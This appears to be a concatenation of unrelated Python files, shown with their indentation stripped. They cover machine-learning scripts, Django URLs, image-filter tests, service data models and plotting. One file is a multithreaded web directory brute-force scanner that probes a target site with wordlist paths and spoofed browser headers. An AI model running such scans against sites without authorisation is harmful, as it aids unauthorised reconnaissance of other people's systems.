for item in l:
print item
def print_no_newline(s):
sys.stdout.write(s)
sys.stdout.flush()
def set_log_level(level):
"""Set the log-level of the root logger of the logging module.
Args:
level: can be an integer such as 30 (logging.WARN), or a string such as 'WARN'
"""
if isinstance(level, str):
level = logging._levelNames[level]
logger = logging.getLogger() # gets root logger
logger.setLevel(level)
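# Hedged usage sketch (not part of the original module): keys written inside a
# Metadata.name_scope() block are stored under the dotted prefix.
#
# m = Metadata()
# with m.name_scope('model'):
#     m['learning_rate'] = 0.01
# print(m['model.learning_rate'])   # 0.01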
|
import numpy as np
import pandas as pd
import lightgbm as lgb
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
data = {
'train': pd.read_pickle('../features/train_with_minmax_p2.pkl'),
'test': pd.read_pickle('../features/test_with_minmax_p2.pkl')
}
x_train = data['train'].drop(['visitors','store_id','visit_date','skew_visitors_g','std_visitors_g',
'std_visitors_s_d','skew_visitors_s_d'], axis=1)
y_train = np.log1p(data['train']['visitors'].values)
x_test = data['test'].drop(['store_id','visit_date','skew_visitors_g','std_visitors_g',
'std_visitors_s_d','skew_visitors_s_d'], axis=1)
x_train['air_diff_date_mean'] = x_train['air_diff_date_mean'].astype('timedelta64[s]')
x_train['hpg_diff_date_mean'] = x_train['hpg_diff_date_mean'].astype('timedelta64[s]')
x_train['week_of_year'] = x_train['week_of_year'].astype(np.int64)
x_test['air_diff_date_mean'] = x_test['air_diff_date_mean'].astype('timedelta64[s]')
x_test['hpg_diff_date_mean'] = x_test['hpg_diff_date_mean'].astype('timedelta64[s]')
x_test['week_of_year'] = x_test['week_of_year'].astype(np.int64)
# Downcast float64 columns to float32
for c, dtype in zip(x_train.columns, x_train.dtypes):
if dtype == np.float64:
x_train[c] = x_train[c].astype(np.float32)
for c, dtype in zip(x_test.columns, x_test.dtypes):
if dtype == np.float64:
x_test[c] = x_test[c].astype(np.float32)
x_test = x_test[x_train.columns]
gbm = lgb.LGBMRegressor(
boosting = 'gbdt',
objective='regression',
num_leaves=80,
learning_rate=0.01,
sub_feature = 0.8,
min_data_in_leaf = 15,
n_estimators=10000
)
gbm.fit(x_train, y_train, eval_metric='rmse')
predict_y = gbm.predict(x_test)
y_test = pd.read_csv('../data/sample_submission.csv',engine='python')
y_test['visitors'] = np.expm1(predict_y)
y_test[['id','visitors']].to_csv(
'0gbm_submission.csv', index=False, float_format='%.3f')
# Find the best parameters by GridSearchCV
#-----------------------------------------------------------------------------------------
# x_train, x_test, y_train, y_test = train_test_split(x_train, y_train, test_size=0.3)
# There are many parameters you can try.
# The more parameters you use, the more time you spend.
# parameters = {
# 'num_leaves' : [40, 60, 80],
# 'max_depth': [15, 20, 25],
# 'learning_rate': [0.008, 0.01, 0.02],
# 'feature_fraction': [0.6, 0.7, 0.8],
# 'sub_feature': [0.6, 0.7, 0.8],
# 'bagging_fraction': [0.6, 0.7, 0.8, 1],
# 'bagging_freq': [2, 4],
# 'min_data_in_leaf' : [5, 10, 15 , 20, 25, 30],
# 'lambda_l2': [0, 0.01, 0.1, 0.05, 0.5],
# }
# gbm = lgb.LGBMRegressor(
# boosting = 'gbdt',
# objective='regression',
# n_estimators=10000
# )
# gsearch = GridSearchCV(gbm, param_grid=parameters)
# gsearch.fit(x_train, y_train, eval_metric='rmse')
# print('Best parameters found by grid search are:', gsearch.best_params_)
# import math
# def rmsle(y, y_pred):
# assert len(y) == len(y_pred)
# terms_to_sum = [(math.log(y_pred[i] + 1) - math.log(y[i] + 1)) ** 2.0 for i,pred in enumerate(y_pred)]
# return (sum(terms_to_sum) * (1.0/len(y))) ** 0.5
# predict_y = gsearch.predict(x_test)
# print('The rmsle of prediction is:', rmsle(y_test, np.expm1(predict_y)))
|
# Copyright (c) 2017 Jared Crapo, K0TFU
import datetime
import persistent
import persistent.mapping
from netcontrol.checkin import Checkin
class Session(persistent.Persistent):
"""Model class for a single session of a directed ham radio net
Data elements for a specific instance of a directed net
Attributes
----------
net_control_station: Operator
The net control for this session of the net
frequency: str
        Frequency for this session of the net, e.g. "447.100- T100Hz"
    start_datetime: datetime
        date and time when the session began
operators: dict
The amateur operators who have checked in to this net
events: list
        sequential list of events that occurred in this net
"""
def __init__(self,net):
self.net = net
self.net_control_station = None
self.frequency = None
self.start_datetime = None
self.operators = persistent.mapping.PersistentMapping()
self.events = persistent.list.PersistentList()
def checkin(self,operator):
# don't add operators without a callsign
if operator.callsign:
# use the callsign as the key = no duplicates
self.operators[operator.callsign] = operator
self.events.append(Checkin(operator))
# add this operator to the net if they aren't there
self.net.add_operator(operator)
def start(self):
self.start_datetime = datetime.datetime.now()
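# Hedged usage sketch (not part of the original module): 'net' and 'operator'
# are placeholders for the Net and Operator objects provided elsewhere in this
# package; checkin() silently ignores an operator without a callsign.
#
# session = Session(net)
# session.start()
# session.checkin(operator)
# print(len(session.operators), len(session.events))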
|
#-*- coding: gbk -*-
import requests
from threading import Thread, activeCount
import Queue
queue = Queue.Queue()
dir_file="php.txt"
def scan_target_url_exists(target_url):
headers={
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://www.google.com'}
status_codes = [200]
try:
req=requests.head(target_url.strip(),timeout=8,headers=headers)
if req.status_code in status_codes:
print 'CODE:%s,URL:%s'%(str(req.status_code),target_url.strip('\n').strip('\r'))
open('exist_target.txt','a').write(target_url)
except:
pass
def open_pathfile(file):
all_lines=open(file,'r').readlines()
for line in all_lines:
if target_url.endswith('/'):
if line.startswith('/'):
queue.put(target_url+line[1:])
else:
queue.put(target_url + line)
else:
if line.startswith('/'):
queue.put(target_url + line)
else:
queue.put(target_url + '/' + line)
if __name__ == '__main__':
print '''
____ _ ____
| _ \(_)_ __/ ___| ___ __ _ _ __
| | | | | '__\___ \ / __/ _` | '_ \
| |_| | | | ___) | (_| (_| | | | |
|____/|_|_| |____/ \___\__,_|_| |_|
'''
target_url=raw_input('Please input your target:')
threadnum = raw_input('Please input your threadnum:')
if target_url.startswith('http://') or target_url.startswith('https://'):
pass
else:
target_url = 'http://' + target_url
print 'The number of threads is %s' % threadnum
print 'Matching.......'
open_pathfile(dir_file)
while queue.qsize() > 0:
if activeCount() <= int(threadnum):
Thread(target=scan_target_url_exists,args=(queue.get(),)).start()
|
#!/usr/bin/env python
import logging
import sys
import unittest
import scipy as sp
import numpy as np
import mango.mpi as mpi
import mango.image
import mango.io
logger, rootLogger = mpi.getLoggers(__name__)
class NeighbourhoodFilterTest(unittest.TestCase):
def setUp(self):
self.mode = "mirror"
self.imgShape = (120, 65, 67)
self.diffTol = 0
def tearDown(self):
pass
def doMangoFiltering(self, input, se, stride=(1,1,1), boffset=(0,0,0), eoffset=(0,0,0)):
output = self.callMangoFilter(input, se, stride=stride, boffset=boffset, eoffset=eoffset)
output.updateHaloRegions()
output.mirrorOuterLayersToBorder(False)
output.updateHaloRegions()
return output
def doScipyFiltering(self, input, se):
inDds = mango.copy(input, halo=se.getHaloSize())
inDds.updateHaloRegions()
inDds.mirrorOuterLayersToBorder(False)
inDds.updateHaloRegions()
outputArr = self.callScipyFilter(inDds, se)
output = mango.empty_like(inDds)
output.asarray()[...] = outputArr
output = mango.copy(output, halo=input.halo)
output.updateHaloRegions()
output.mirrorOuterLayersToBorder(False)
output.updateHaloRegions()
return output
def doFilterTestWithHalo(self, haloSz=0):
if (isinstance(haloSz, int) or ((sys.version_info.major < 3) and isinstance(haloSz, long))):
if (haloSz < 0):
haloSz = 0
haloSz = sp.array((haloSz,)*3)
imgDds = mango.data.gaussian_noise(shape=self.imgShape, mean=32000, stdd=4000.0, mtype="tomo", halo=haloSz)
slc = []
for d in range(len(haloSz)):
slc.append(slice(haloSz[d], imgDds.asarray().shape[d]-haloSz[d]))
slc = tuple(slc)
se = mango.image.sphere_se(radius=1.0)
mfDds = self.doMangoFiltering(imgDds, se)
sfDds = self.doScipyFiltering(imgDds, se)
self.assertTrue(sp.all(imgDds.dtype == mfDds.dtype))
self.assertTrue(sp.all(imgDds.mtype == mfDds.mtype), "%s != %s" % (imgDds.mtype, mfDds.mtype))
self.assertTrue(sp.all(imgDds.halo == mfDds.halo))
self.assertTrue(sp.all(imgDds.shape == mfDds.shape))
self.assertTrue(sp.all(imgDds.origin == mfDds.origin), "%s != %s" % (imgDds.origin, mfDds.origin))
self.assertTrue(sp.all(imgDds.mpi.shape == mfDds.mpi.shape))
logger.info("imgDds min = %s, imgDds max = %s" % (np.min(imgDds.asarray()), np.max(imgDds.asarray())))
logger.info("mfDds min = %s, mfDds max = %s" % (np.min(mfDds.asarray()[slc]), np.max(mfDds.asarray()[slc])))
logger.info("sfDds min = %s, sfDds max = %s" % (np.min(sfDds.asarray()[slc]), np.max(sfDds.asarray()[slc])))
logger.info("num non-zero mfDds-sfDds = %s" % sp.sum(sp.where((mfDds.asarray()[slc]-sfDds.asarray()[slc]) != 0, 1, 0)))
logger.info(
"abs(sfDds-mfDds) min = %s, abs(sfDds-mfDds) max = %s"
%
(
np.min(sp.absolute(mfDds.asarray()[slc]-sfDds.asarray()[slc])),
np.max(sp.absolute(mfDds.asarray()[slc]-sfDds.asarray()[slc]))
)
)
tmpDds = mango.copy(mfDds, dtype="int32")
tmpDds.updateHaloRegions()
tmpDds.mirrorOuterLayersToBorder(False)
self.assertLessEqual(
np.max(sp.absolute(tmpDds.asarray()[slc] - sfDds.asarray()[slc])),
self.diffTol
)
self.assertLessEqual(
np.max(sp.absolute(tmpDds.asarray() - sfDds.asarray())),
self.diffTol
)
imgDds = mango.data.gaussian_noise(shape=self.imgShape, mean=5000, stdd=4500, dtype="int32", halo=haloSz, origin=(-32,8,64))
se = mango.image.sphere_se(radius=3.0)
mfDds = self.doMangoFiltering(imgDds, se)
sfDds = self.doScipyFiltering(imgDds, se)
self.assertTrue(sp.all(imgDds.dtype == mfDds.dtype))
#self.assertTrue(sp.all(imgDds.mtype == mfDds.mtype))
self.assertTrue(sp.all(imgDds.halo == mfDds.halo))
self.assertTrue(sp.all(imgDds.shape == mfDds.shape))
self.assertTrue(sp.all(imgDds.origin == mfDds.origin), "%s != %s" % (imgDds.origin, mfDds.origin))
self.assertTrue(sp.all(imgDds.mpi.shape == mfDds.mpi.shape))
logger.info("imgDds min = %s, imgDds max = %s" % (np.min(imgDds.asarray()), np.max(imgDds.asarray())))
logger.info("mfDds min = %s, mfDds max = %s" % (np.min(mfDds.asarray()[slc]), np.max(mfDds.asarray()[slc])))
logger.info("sfDds min = %s, sfDds max = %s" % (np.min(sfDds.asarray()[slc]), np.max(sfDds.asarray()[slc])))
logger.info("num non-zero mfDds-sfDds = %s" % sp.sum(sp.where((mfDds.asarray()[slc]-sfDds.asarray()[slc]) != 0, 1, 0)))
logger.info(
"abs(sfDds-mfDds) min = %s, abs(sfDds-mfDds) max = %s"
%
(
np.min(sp.absolute(mfDds.asarray()-sfDds.asarray())),
np.max(sp.absolute(mfDds.asarray()-sfDds.asarray()))
)
)
self.assertLessEqual(
np.max(sp.absolute(mfDds.asarray()[slc] - sfDds.asarray()[slc])),
self.diffTol
)
self.assertLessEqual(
np.max(sp.absolute(mfDds.asarray() - sfDds.asarray())),
self.diffTol
)
class _NeighbourhoodFilterTestImpl:
def testStrideAndOffset(self):
org = sp.array((-122,333,117), dtype="int32")
shp = sp.array((64,65,67), dtype="int32")
imgDds = mango.data.gaussian_noise(shape=shp, origin=org, mean=5000, stdd=4500, dtype="int32")
se = mango.image.order_se(order=4)
boffset = (1,2,-3)
mfDds = self.doMangoFiltering(imgDds, se, boffset=boffset)
rootLogger.info("=====boffset=%s=======" % (boffset,))
rootLogger.info("imgDds.origin=%s, imgDds.shape=%s" % (imgDds.origin, imgDds.shape))
rootLogger.info("mfDds.origin=%s, mfDds.shape=%s" % (mfDds.origin, mfDds.shape))
self.assertTrue(sp.all(mfDds.origin == (org + boffset)))
self.assertTrue(sp.all(mfDds.shape == (shp - boffset)))
eoffset = (-3,1,-2)
mfDds = self.doMangoFiltering(imgDds, se, eoffset=eoffset)
rootLogger.info("=====eoffset=%s=======" % (eoffset,))
rootLogger.info("imgDds.origin=%s, imgDds.shape=%s" % (imgDds.origin, imgDds.shape))
rootLogger.info("mfDds.origin=%s, mfDds.shape=%s" % (mfDds.origin, mfDds.shape))
self.assertTrue(sp.all(mfDds.origin == (org)))
self.assertTrue(sp.all(mfDds.shape == (shp + eoffset)))
mfDds = self.doMangoFiltering(imgDds, se, boffset=boffset, eoffset=eoffset)
rootLogger.info("=====boffset=%s, eoffset=%s=======" % (boffset, eoffset,))
rootLogger.info("imgDds.origin=%s, imgDds.shape=%s" % (imgDds.origin, imgDds.shape))
rootLogger.info("mfDds.origin=%s, mfDds.shape=%s" % (mfDds.origin, mfDds.shape))
self.assertTrue(sp.all(mfDds.origin == (org + boffset)))
self.assertTrue(sp.all(mfDds.shape == (shp -boffset + eoffset)))
stride = (2,4,3)
mfDds = self.doMangoFiltering(imgDds, se, stride=stride)
rootLogger.info("=====stride=%s=======" % (stride,))
rootLogger.info("imgDds.origin=%s, imgDds.shape=%s" % (imgDds.origin, imgDds.shape))
rootLogger.info("mfDds.origin=%s, mfDds.shape=%s" % (mfDds.origin, mfDds.shape))
self.assertTrue(sp.all(mfDds.origin == np.round(sp.array(org,dtype="float64")/stride)))
self.assertTrue(sp.all(mfDds.shape == sp.ceil(shp/sp.array(stride, dtype="float32"))))
stride = (2,4,3)
mfDds = self.doMangoFiltering(imgDds, se, stride=stride, boffset=boffset, eoffset=eoffset)
rootLogger.info("=====stride=%s, boffset=%s, eoffset=%s=======" % (stride,boffset,eoffset))
rootLogger.info("imgDds.origin=%s, imgDds.shape=%s" % (imgDds.origin, imgDds.shape))
rootLogger.info("mfDds.origin=%s, mfDds.shape=%s" % (mfDds.origin, mfDds.shape))
self.assertTrue(sp.all(mfDds.origin == np.round(sp.array((org+boffset), dtype="float64")/stride)))
self.assertTrue(sp.all(mfDds.shape == sp.ceil((shp-boffset+eoffset)/sp.array(stride, dtype="float32"))))
def testFilteringHalo0(self):
self.doFilterTestWithHalo(0)
def testFilteringHalo2(self):
self.doFilterTestWithHalo(2)
def testFilteringHalo5(self):
self.doFilterTestWithHalo(5)
class MeanFilterTest(NeighbourhoodFilterTest,_NeighbourhoodFilterTestImpl):
def setUp(self):
NeighbourhoodFilterTest.setUp(self)
self.diffTol = 1
def callMangoFilter(self, input, se, stride=(1,1,1), boffset=(0,0,0), eoffset=(0,0,0)):
output = mango.image.mean_filter(input, se, mode=self.mode, stride=stride, boffset=boffset, eoffset=eoffset)
return output
def callScipyFilter(self, inDds, se):
footprint = se.toFootprint()
kernel = sp.zeros(footprint.shape, dtype="float64")
kernel[sp.where(footprint)] = 1.0
rootLogger.info("Num footprint elements = %s" % sp.sum(sp.where(footprint, 1, 0)))
kernel /= sp.sum(kernel)
outputArr = sp.ndimage.convolve(inDds.asarray(), weights=kernel, mode=self.mode)
return outputArr
class MedianFilterTest(NeighbourhoodFilterTest,_NeighbourhoodFilterTestImpl):
def setUp(self):
NeighbourhoodFilterTest.setUp(self)
self.diffTol = 0
def callMangoFilter(self, input, se, stride=(1,1,1), boffset=(0,0,0), eoffset=(0,0,0)):
output = mango.image.median_filter(input, se, mode=self.mode, stride=stride, boffset=boffset, eoffset=eoffset)
return output
def callScipyFilter(self, inDds, se):
footprint = se.toFootprint()
rootLogger.info("Num footprint elements = %s" % sp.sum(sp.where(footprint, 1, 0)))
rootLogger.info("Footprint.shape = %s" % (footprint.shape,))
outputArr = sp.ndimage.median_filter(inDds.asarray(), footprint=footprint, mode=self.mode)
return outputArr
class ConvolutionFilterTest(NeighbourhoodFilterTest,_NeighbourhoodFilterTestImpl):
def setUp(self):
NeighbourhoodFilterTest.setUp(self)
self.diffTol = 1
def getWeights(self, se):
shape = se.toFootprint().shape
return mango.image.discrete_gaussian_kernel(sigma=np.min(shape)/(2*3.25))
def callMangoFilter(self, input, se, stride=(1,1,1), boffset=(0,0,0), eoffset=(0,0,0)):
output = mango.image.convolve(input, self.getWeights(se), mode=self.mode, stride=stride, boffset=boffset, eoffset=eoffset)
return output
def callScipyFilter(self, inDds, se):
kernel = self.getWeights(se)
rootLogger.info("Num kernel elements = %s" % sp.sum(sp.where(kernel, 1, 0)))
rootLogger.info("kernel.shape = %s" % (kernel.shape,))
outputArr = sp.ndimage.convolve(inDds.asarray(), weights=kernel, mode=self.mode)
return outputArr
if __name__ == "__main__":
mpi.initialiseLoggers(
[__name__, "mango.mpi", "mango.image", "mango.imageTest"],
logLevel=logging.INFO
)
unittest.main()
|
from django.conf.urls import url
from misago.search.views import landing, search
urlpatterns = [
url(r'^search/$', landing, name='search'),
url(r'^search/(?P<search_provider>[-a-zA-Z0-9]+)/$', search, name='search'),
]
|
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path,include
from . import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home,name='home'),
path('badge/', include('badge.urls')),
]+ static(settings.MEDIA_URL ,document_root=settings.MEDIA_ROOT)
|
from functools import partial
from operator import is_not
import numpy as np
import pandas as pd
def nutrient_color(value):
return 'text-success' if value <= 0.15 else 'text-danger'
def make_list(x):
return list(filter(partial(is_not, np.nan), list(x)))
def rank_suffix(i):
i = i + 1
if i >= 11 and 11 <= int(str(i)[-2:]) <= 13:
return f'{i}th'
remainder = i % 10
if remainder == 1:
return f'{i}st'
elif remainder == 2:
return f'{i}nd'
elif remainder == 3:
return f'{i}rd'
else:
return f'{i}th'
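# Worked examples (added note, not in the original): rank_suffix() takes a
# zero-based index, so
#   rank_suffix(0)  -> '1st'
#   rank_suffix(10) -> '11th'   (the teens always get 'th')
#   rank_suffix(21) -> '22nd'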
def build_top_x_sentence(s: pd.Series, x):
if x > s.nunique():
x = s.nunique()
common_categories = s.value_counts().head(x).to_dict()
    if x == 1:
        # common_categories has exactly one key here; s.unique() returns an
        # ndarray and is not hashable, so use the top category directly
        top_value = next(iter(common_categories))
        return f'{top_value} ({common_categories[top_value]} products)'
sen = ', '.join([f'{key} ({common_categories[key]} products)' for key in common_categories])
sen_par = sen.rpartition(', ')
return sen_par[0] + ', and ' + sen_par[-1]
# This gets the 3 most common ingredients but does not preprocess the ingredient lists
def build_top_ingredient_sentence(ingredients: pd.Series):
common_ingredients = pd.Series(' '.join(ingredients.fillna('').str.lower().tolist())
.split(',')).value_counts().head(3).index.tolist()
if len(common_ingredients) >= 3:
return f'The three most common ingredients in this category are \
{common_ingredients[0]}, {common_ingredients[1]}, and {common_ingredients[2]}.'
elif len(common_ingredients) == 2:
return f'The two most common ingredients in this category are \
{common_ingredients[0]} and {common_ingredients[1]}.'
# Seems unlikely to only have one ingredient, note it can still have 0 ingredients in which case this sentence
# will not be displayed
elif len(common_ingredients) == 1:
return f'The only ingredient in this category is {common_ingredients[0]}.'
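# Hedged usage sketch (not part of the original module): exercises rank_suffix and
# build_top_x_sentence on a tiny hand-made Series so the expected phrasing is visible.
if __name__ == '__main__':
    assert [rank_suffix(i) for i in range(4)] == ['1st', '2nd', '3rd', '4th']
    categories = pd.Series(['Snacks', 'Snacks', 'Snacks', 'Drinks', 'Drinks', 'Dairy'])
    # e.g. "Snacks (3 products), Drinks (2 products), and Dairy (1 products)"
    print(build_top_x_sentence(categories, 3))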
|
from batou.component import Component, Attribute
from batou.lib.file import File
from batou.utils import Address
from batou_ext.keypair import KeyPair
import socket
import os
def resolve_v6(address):
return socket.getaddrinfo(
address.connect.host,
address.connect.port,
socket.AF_INET6)[0][4][0]
class PFAPostfix(Component):
address = Attribute(Address, 'localhost:25')
def configure(self):
self.address.listen.host_v6 = resolve_v6(self.address)
self.db = self.require_one('pfa::database')
self.keypair = self.require_one('keypair::mail')
self.provide('postfix', self.address)
self += File(
'/etc/postfix/myhostname',
content=self.address.connect.host)
self += File(
'/etc/postfix/main.d/40_local.cf',
source=self.resource('local.cf'))
self += File(
'postfixadmin_virtual_alias',
source=self.resource('postfixadmin_virtual_alias'))
self += File(
'postfixadmin_virtual_domains',
source=self.resource('postfixadmin_virtual_domains'))
self += File(
'postfixadmin_virtual_sender_login',
source=self.resource('postfixadmin_virtual_sender_login'))
self += File(
'postfixadmin_virtual_mailboxes',
source=self.resource('postfixadmin_virtual_mailboxes'))
def resource(self, filename):
return os.path.join(
os.path.dirname(__file__),
'postfix',
filename)
|
from ctypes import byref
from ctypes import c_uint
from pyglet import gl
from .vertex import Vertices
class VertexArrayObject:
"""
A vertex array object (VAO) is a kind of context object for a bunch of
vertex buffers and related settings.
"""
def __init__(self, vertices_class=Vertices):
self.name = gl.GLuint()
self.vertices_class = vertices_class
gl.glCreateVertexArrays(1, byref(self.name))
def __enter__(self):
gl.glBindVertexArray(self.name)
def __exit__(self, exc_type, exc_val, exc_tb):
gl.glBindVertexArray(0)
def create_vertices(self, data):
"Just a convenience."
return self.vertices_class(self, data)
def delete(self):
gl.glDeleteVertexArrays(1, (c_uint*1)(self.name))
def __del__(self):
try:
self.delete()
except ImportError:
pass
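# Hedged usage sketch (not part of the original module): a VAO is bound with a
# `with` block while buffers and attribute bindings are set up.  This needs a
# live OpenGL context capable of glCreateVertexArrays (GL 4.5 / DSA), so the
# sketch opens a hidden pyglet window first; real vertex data would be passed to
# create_vertices in whatever layout the Vertices class expects.
if __name__ == "__main__":
    import pyglet
    window = pyglet.window.Window(visible=False)  # provides the GL context
    vao = VertexArrayObject()
    with vao:
        pass  # buffers and attribute bindings would be configured here
    vao.delete()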
|
from typing import List, Optional as Opt
from assemblyline import odm
from assemblyline.common import forge
from assemblyline.common.constants import DEFAULT_SERVICE_ACCEPTS, DEFAULT_SERVICE_REJECTS
Classification = forge.get_classification()
@odm.model(index=False, store=False)
class EnvironmentVariable(odm.Model):
name = odm.Keyword()
value = odm.Keyword()
@odm.model(index=False, store=False)
class DockerConfig(odm.Model):
allow_internet_access: bool = odm.Boolean(default=False)
command: Opt[List[str]] = odm.Optional(odm.List(odm.Keyword()))
cpu_cores: float = odm.Float(default=1.0)
environment: List[EnvironmentVariable] = odm.List(odm.Compound(EnvironmentVariable), default=[])
image: str = odm.Keyword() # Complete name of the Docker image with tag, may include registry
registry_username = odm.Optional(odm.Keyword()) # The username to use when pulling the image
registry_password = odm.Optional(odm.Keyword()) # The password or token to use when pulling the image
ports: List[str] = odm.List(odm.Keyword(), default=[])
ram_mb: int = odm.Integer(default=512)
ram_mb_min: int = odm.Integer(default=128)
@odm.model(index=False, store=False)
class PersistentVolume(odm.Model):
mount_path = odm.Keyword() # Path into the container to mount volume
capacity = odm.Keyword() # Bytes
storage_class = odm.Keyword()
@odm.model(index=False, store=False)
class DependencyConfig(odm.Model):
container = odm.Compound(DockerConfig)
volumes = odm.Mapping(odm.Compound(PersistentVolume), default={})
@odm.model(index=False, store=False)
class UpdateSource(odm.Model):
name = odm.Keyword()
password = odm.Optional(odm.Keyword(default=""))
pattern = odm.Optional(odm.Keyword(default=""))
private_key = odm.Optional(odm.Keyword(default=""))
ca_cert = odm.Optional(odm.Keyword(default=""))
ssl_ignore_errors = odm.Boolean(default=False)
proxy = odm.Optional(odm.Keyword(default=""))
uri = odm.Keyword()
username = odm.Optional(odm.Keyword(default=""))
headers = odm.List(odm.Compound(EnvironmentVariable), default=[])
default_classification = odm.Classification(default=Classification.UNRESTRICTED)
@odm.model(index=False, store=False)
class UpdateConfig(odm.Model):
# build_options = odm.Optional(odm.Compound(DockerfileConfig)) # If we are going to build a container, how?
generates_signatures = odm.Boolean(index=True, default=False)
method = odm.Enum(values=['run', 'build']) # Are we going to run or build a container?
run_options = odm.Optional(odm.Compound(DockerConfig)) # If we are going to run a container, which one?
sources = odm.List(odm.Compound(UpdateSource), default=[]) # Generic external resources we need
update_interval_seconds = odm.Integer() # Update check interval in seconds
wait_for_update = odm.Boolean(default=False)
@odm.model(index=False, store=False)
class SubmissionParams(odm.Model):
default = odm.Any()
name = odm.Keyword()
type = odm.Enum(values=['str', 'int', 'list', 'bool'])
value = odm.Any()
list = odm.Optional(odm.Any())
@odm.model(index=True, store=False)
class Service(odm.Model):
# Regexes applied to assemblyline style file type string
accepts = odm.Keyword(store=True, default=DEFAULT_SERVICE_ACCEPTS)
rejects = odm.Optional(odm.Keyword(store=True, default=DEFAULT_SERVICE_REJECTS))
category = odm.Keyword(store=True, default="Static Analysis", copyto="__text__")
config = odm.Mapping(odm.Any(), default={}, index=False, store=False)
description = odm.Text(store=True, default="NA", copyto="__text__")
default_result_classification = odm.ClassificationString(default=Classification.UNRESTRICTED)
enabled = odm.Boolean(store=True, default=False)
is_external = odm.Boolean(default=False)
licence_count = odm.Integer(default=0)
name = odm.Keyword(store=True, copyto="__text__")
version = odm.Keyword(store=True)
# Should the result cache be disabled for this service
disable_cache = odm.Boolean(default=False)
stage = odm.Keyword(store=True, default="CORE", copyto="__text__")
submission_params: SubmissionParams = odm.List(odm.Compound(SubmissionParams), index=False, default=[])
timeout = odm.Integer(default=60)
docker_config: DockerConfig = odm.Compound(DockerConfig)
dependencies = odm.Mapping(odm.Compound(DependencyConfig), default={})
update_channel: str = odm.Enum(values=["stable", "rc", "beta", "dev"], default='stable')
update_config: UpdateConfig = odm.Optional(odm.Compound(UpdateConfig))
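# Hedged sketch (not part of the original definitions): of the fields above, only
# name, version and docker_config.image lack defaults (plus UpdateConfig's method
# and update_interval_seconds when updates are configured), so a minimal service
# description only needs to provide those.  The values below are illustrative
# placeholders, not real services or images.
EXAMPLE_SERVICE_FIELDS = {
    "name": "ExampleService",            # hypothetical service name
    "version": "4.0.0.dev0",             # hypothetical version string
    "docker_config": {
        "image": "example/example-service:latest",  # hypothetical image
    },
}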
|
#! /usr/bin/env python
#
##plotting exercise
##created by Nate
##06/24/2019
import numpy as np
import matplotlib.pyplot as plt
def vrot(x, m):
return x / pow(1+x**m, 1/m)
x =np.linspace(0,10,1000)
ve = 1-np.exp(-x)
v7 = vrot(x,0.75)
v1 = vrot(x,1)
v2 = vrot(x,2)
v4 = vrot(x,4)
v100 = vrot(x,100)
#plt.plot(x, v7, '-r', label='m=0.75')
plt.plot(x, v1, '-r', label='m=1')
#plt.plot(x, v1_5, '-m', label='m=1.5')
plt.plot(x, v2, '-k', label='m=2')
plt.plot(x, v4, '-b', label='m=4')
#plt.plot(x, v10, '-g', label='m=10')
#plt.plot(x, v25, '-c', label='m=25')
plt.plot(x, v100, '-g', label='m=100')
plt.plot(x, ve, '--m', label='exp')
plt.title('Model Rotation Curves: $V/V_0 = r / (1+r^m)^{1/m}, r=R/R_0$')
plt.xlabel('$R/R_O$')
plt.ylabel('$V/V_O$')
plt.legend(loc='lower right')
plt.grid()
plt.savefig('model_rot_curve.pdf')
plt.show()
|
from discord.ext import commands
from discord.message import Message
class DiscordLimb(commands.Cog):
""" Effectively contains documentation for the useful pycord functions. """
@commands.Cog.listener()
    async def on_ready(self) -> None:
        """ Called when the client is done preparing the data received from Discord. Don't access the API until this is called.
This function is not guaranteed to only be called once. This library implements reconnection logic and thus
will end up calling this event whenever a RESUME request fails.
"""
pass
@commands.Cog.listener()
async def on_message(self, message: Message) -> None:
""" Called when a message is received from Discord. """
pass
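# Hedged usage sketch (not part of the original file): registering the cog with a
# bot.  With py-cord, Bot.add_cog is synchronous; on discord.py 2.x it must be
# awaited instead.  The prefix and token below are placeholders.
if __name__ == "__main__":
    import discord
    bot = commands.Bot(command_prefix="!", intents=discord.Intents.default())
    bot.add_cog(DiscordLimb())
    # bot.run("YOUR_BOT_TOKEN")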
|
import sys
import numpy as np
I = np.array(sys.stdin.read().split(), dtype=np.int64)
n = I[0]
t = I[1 : 1 + n]
m = I[1 + n]
p, x = I[2 + n :].reshape(m, 2).T
def main():
default = np.sum(t)
res = default + (x - t[p - 1])
return res
if __name__ == "__main__":
ans = main()
print(*ans, sep="\n")
|
"""alie cli tests."""
from os import environ
from click.testing import CliRunner
from alie import cli
def test_main(tmpdir):
"""Sample test for main command."""
runner = CliRunner()
environ['ALIE_JSON_PATH'] = tmpdir.join('json').strpath
environ['ALIE_ALIASES_PATH'] = tmpdir.join('aliases').strpath
for i in range(10):
params = [f'test_quick_{i}', 'echo']
result = runner.invoke(cli.main, params)
assert 'CREATED' in result.output
params = ['test_quick_0']
result = runner.invoke(cli.main, params)
assert 'REMOVED' in result.output
result = runner.invoke(cli.main, [])
assert '[9 registered]' in result.output
result = runner.invoke(cli.main, ['hello'])
assert 'not registered' in result.output
    params = ['say-message', 'echo "$@"', '-f']
result = runner.invoke(cli.main, params)
assert 'CREATED' in result.output
params = [f'"clear console"', 'clear']
result = runner.invoke(cli.main, params)
assert 'CREATED' in result.output
result = runner.invoke(cli.main, [])
assert 'function ' in result.output
assert 'say-message' in result.output
assert 'clear_console' in result.output
|
import argparse
import os
import random
import time
import logging
import pdb
from tqdm import tqdm
import numpy as np
import scipy.io as sio
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import torch.nn.functional as F
from torch.autograd import Variable
from model.loss import rpn_cross_entropy_balance, rpn_smoothL1, box_iou3d, focal_loss
from utils.anchors import cal_rpn_target, cal_anchors
from loader.Dataset import SiameseTrain
from model.model import SiamPillar
from config import cfg
parser = argparse.ArgumentParser()
parser.add_argument('--batchSize', type=int, default=4, help='input batch size')
parser.add_argument('--workers', type=int, default=0, help='number of data loading workers')
parser.add_argument('--nepoch', type=int, default=60, help='number of epochs to train for')
parser.add_argument('--ngpu', type=int, default=1, help='# GPUs')
